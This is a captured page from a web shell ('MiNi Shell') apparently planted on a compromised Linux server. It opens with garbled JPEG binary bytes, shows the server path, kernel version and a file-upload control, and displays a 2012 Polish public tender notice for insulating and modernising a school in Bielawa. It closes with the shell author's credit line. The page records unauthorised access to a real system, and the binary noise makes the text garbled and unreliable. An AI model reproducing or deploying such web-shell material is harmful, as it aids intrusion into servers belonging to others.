JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120411/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120411/82057-N-2012.html

<p class="kh_header"><b>Dzierżoniów: roboty budowlane polegające na termomodernizacji budynku głównego i sali gimnastycznej Zespołu Szkół Ogólnokształcących w Bielawie, przy ul. Szkolnej 5</b><br>
<b>Numer ogłoszenia: 82057 - 2012; data zamieszczenia: 11.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Dzierżoniowskiego , Rynek 27, 58-200 Dzierżoniów, woj. dolnośląskie, tel. 074 8325220, 8316789, faks 073 8316601.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.pow.dzierzoniow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> roboty budowlane polegające na termomodernizacji budynku głównego i sali gimnastycznej Zespołu Szkół Ogólnokształcących w Bielawie, przy ul. Szkolnej 5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest termomodernizacja budynku głównego i sali gimnastycznej Zespołu Szkół Ogólnokształcących w Bielawie, przy ul. Szkolnej 5.
Zakres przedmiotu zamówienia obejmuje:
ocieplenie stropu w budynku głównym o pow. 607 m2, wełną mineralną o współczynniku lambda równym 0,042 W/m2 K o grubości 15 cm,
ocieplenie ścian klatki schodowej w budynku głównym o pow. 73 m2 wełną mineralną o współczynniku lambda równym 0,042 W/m2 K o grubości 15 cm,
wymianę stolarki okiennej w budynku sali gimnastycznej,
ocieplenie dachu sali gimnastycznej o pow. 579 m2, styropianem o współczynniku lambda równym 0,038 W/m2 K, o grubości 14 cm,
modernizację kotłowni w budynku głównym szkoły i sali gimnastycznej,
wymianę instalacji c.o. (wymiana rur na miedziane, wymiana grzejników wyposażonych w zawory termostatyczne, zawory regulacyjne i ekrany zagrzejnikowe w budynku głównym szkoły i sali gimnastycznej).
Uwaga!
W pomieszczeniu zaplecza przylegającym do sali gimnastycznej, tzw. dobudówce
zrezygnowano z instalacji dwóch grzejników oraz docieplenia dachu. Należy przeprowadzić
w dobudówce wyłącznie prace niezbędne do zamknięcia obwodu instalacji c.o.
Zakres wymiany stolarki okiennej dotyczy tylko budynku sali gimnastycznej (patrz rys. 14 w projekcie budowlanym), natomiast nie obejmuje budynku głównego. Przy wymianie stolarki okiennej należy uwzględnić demontaż parapetów zewnętrznych i wewnętrznych, dostawę
okien, demontaż istniejącej stolarki drewnianej i montaż nowej stolarki wykonanej z PCV,
montaż parapetów zewnętrznych, montaż parapetów wewnętrznych, wykonanie uzupełnienia
tynków, malowanie, montaż nawiewników.
Okna należy wykonać w kolorze białym, jako stolarkę jednoramową PCV, 5 komorową z
wkładka termiczną lub rozwiązaniem równoważnym, umożliwiającym osiągnięcie zbliżonego
do projektowanego współczynnika przenikania ciepła. Na sali gimnastycznej średni
współczynnik przenikania ciepła U=1,20 W/m2 K. Wartość współczynnika przenikania
ciepła założonego w projekcie dla całej stolarki okiennej można również osiągnąć przez zastosowanie innych rozwiązań niż opisane w projekcie. Należy odtworzyć istniejące podziały okien, szprosy i słupki naklejane na szybę.
UWAGA!
Przy wymianie okien na sali gimnastycznej należy zastąpić istniejące kraty okienne
zastosowaniem w oknach szyb P2, w następujący sposób:
(patrz rys 14 w projekcie budowlanym)
dla OK 13 - 6 szt. - podwójną szybę P2, szyba zewnętrzna od strony dolnej do połowy powierzchni okna zmatowiona,
dla OK. 9 - 2 szt. - zewnętrzna szyba P2, wewnętrzna szyba bezpieczna O2,
dla OK 1- 2 szt. -zewnętrzna szyba P2, wewnętrzna szyba bezpieczna O2,
dla OK5, OK6, OK7, OK8, OK11 i OK12 - wewnętrzna szyba P2, zewnętrzna szyba bezpieczna O2 (szyby takie nie są ujęte w projekcie budowlanym, ale posiadamy zgodę projektanta na zastosowanie takich rozwiązań zamiast okratowania okien).
W roku ubiegłym w budynku szkoły wymieniono pokrycie dachowe i docieplono skosy.
Dlatego zamówienie nie obejmuje w swoim zakresie prac związanych z wymianą dachu w
budynku dydaktycznym, pomimo ujęcia ich w dokumentacji projektowej!
Zaleca się, aby wykonawca dokonał wizji lokalnej terenu budowy i jego otoczenia przed
sporządzeniem oferty.
Wszystkie prace w zakresie przedmiotu zamówienia powinny być wykonane zgodnie z
opisem w SIWZ oraz szczegółowym opisem w dokumentacji projektowej i STWiOR
stanowiącymi załącznik nr 1 do SIWZ.
Dokumentację projektową stanowi:
projekt architektoniczno-budowlany budynek szkoły i sali gimnastycznej,
projekt budowlany modernizacji kotłowni oraz instalacji centralnego ogrzewania w budynku szkoły,
projekt budowlany modernizacji kotłowni oraz instalacji centralnego ogrzewania w sali gimnastycznej,
specyfikacja techniczna wykonania i odbioru robót,
szczegółowa specyfikacja techniczna wykonania i odbioru robót - instalacje c.o. sala,
szczegółowa specyfikacja techniczna wykonania i odbioru robót - kotłownia sala,
szczegółowa specyfikacja techniczna wykonania i odbioru robót - instalacje c.o. szkoła,
szczegółowa specyfikacja techniczna wykonania i odbioru robót - kotłownia szkoła..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.45.30.00-7, 45.42.11.00-5, 45.40.00.00-1, 45.32.10.00-3, 45.33.11.00-7, 45.33.11.10-0, 45.33.12.10-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 25.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść wadium w
wysokości 19 000 zł (słownie: dziewiętnaście tysięcy złotych).
a)Wadium może być wniesione w:
pieniądzu,
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
gwarancjach bankowych,
gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Z 2007 r. Nr 42, poz. 275 z późn. zm.).
b)Wadium w formie pieniądza należy wnieść przelewem na konto zamawiającego: 
Bank Spółdzielczy w Dzierżoniowie Nr 46 9527 0007 0026 0837 2000 0002
Wniesienie wadium w formie pieniężnej będzie skuteczne, jeżeli w podanym terminie na składanie ofert, do godz. 08:30, znajdzie się na rachunku bankowym zamawiającego.
c)Zamawiający zaleca, aby w przypadku wniesienia wadium w formie:
pieniężnej dokument potwierdzający wniesienie wadium został załączony do oferty,
innej niż pieniądz, oryginał dokumentu został złożony w siedzibie zamawiającego-Starostwo Powiatowe w Dzierżoniowie, Rynek 27, 58-200 Dzierżoniów, w kasie zamawiającego, a jego kopia w ofercie.
d)Z treści gwarancji/poręczenia winno wynikać bezwarunkowe zobowiązanie Gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art.46 ust. 4a oraz ust. 5 ustawy PZP, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą.
e)Wykonawca, który nie wniesie wadium w terminie do 27.04.2012 do godz. 08:30 lub nie zabezpieczy oferty akceptowalną formą wadium zostanie wykluczony z postępowania, a jego oferta zostanie uznana za odrzuconą.
f)Okoliczności i zasady zwrotu wadium, jego przepadku oraz zasady jego zaliczania na
poczet zabezpieczenia należytego wykonania umowy określa ustawa PZP.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy
wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a
jeżeli okres prowadzenia działalności jest krótszy to w tym okresie, wykonał co
najmniej 2 zamówienia o wartości brutto min. 1 000 000 zł każde (słownie: jeden
milion złotych), polegające na wykonaniu robót budowlanych, w zakresie wymiany
instalacji centralnego ogrzewania, docieplenia i wymiany stolarki okiennej w
budynku sklasyfikowanym wg Polskiej Klasyfikacji Obiektów Budowlanych (Dz. U.
z 1999 Nr 112, poz. 1316 ze zm.) w grupie 126.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że
dysponuje następującymi osobami przewidzianymi do realizacji zamówienia:
-kierownikiem budowy posiadającym uprawnienia budowlane bez ograniczeń do
kierowania robotami budowlanymi o specjalności konstrukcyjno-budowlanej i min. 5
letnie doświadczenie na stanowisku kierownika budowy (1 osoba)
- kierownikiem robót posiadającym uprawnienia budowlane w branży instalacyjnej w
zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych,
wodociągowych i kanalizacyjnych - 1 osoba posiadająca min. 5 letnie doświadczenie
na stanowisku kierownika robót lub kierownika budowy
- kierownikiem robót posiadającym uprawnienia budowlane do kierowania robotami
budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń
elektrycznych i elektroenergetycznych - 1 osoba.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy
wykaże, że posiada środki finansowe na rachunku bankowym bądź w spółdzielczej
kasie oszczędnościowo-kredytowej lub zdolność kredytową w wysokości co najmniej
900 000 zł ( słownie: dziewięćset tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ustawy PZP dopuści zmianę umowy dotyczącą
przedmiotu lub umówionego terminu wykonania zamówienia w następujących przypadkach:
. z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych
polegających na niezgodności dokumentacji z przepisami prawa,
. z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu
zamówienia proponowanych przez zamawiającego lub wykonawcę, jeżeli te zmiany
są korzystne dla zamawiającego,
. z powodu wystąpienia robót dodatkowych, niemożliwych do przewidzenia przed
zawarciem umowy przez wykonawcę, a których wykonanie może spowodować
opóźnienia w wykonaniu zadania podstawowego
. z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego
przez czynniki zewnętrzne, którego nie można było przewidzieć, w szczególności
zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem
szkody w znacznych rozmiarach,
. z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to
działania nie są konsekwencją winy którejkolwiek ze stron.
O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca powinien
poinformować Zamawiającego pisemnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.pow.dzierzoniow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 58-200 Dzierżoniów, Rynek 27.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.04.2012 godzina 08:30, miejsce: 58-200 Dzierżoniów, Rynek 27, parter - BOK, pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com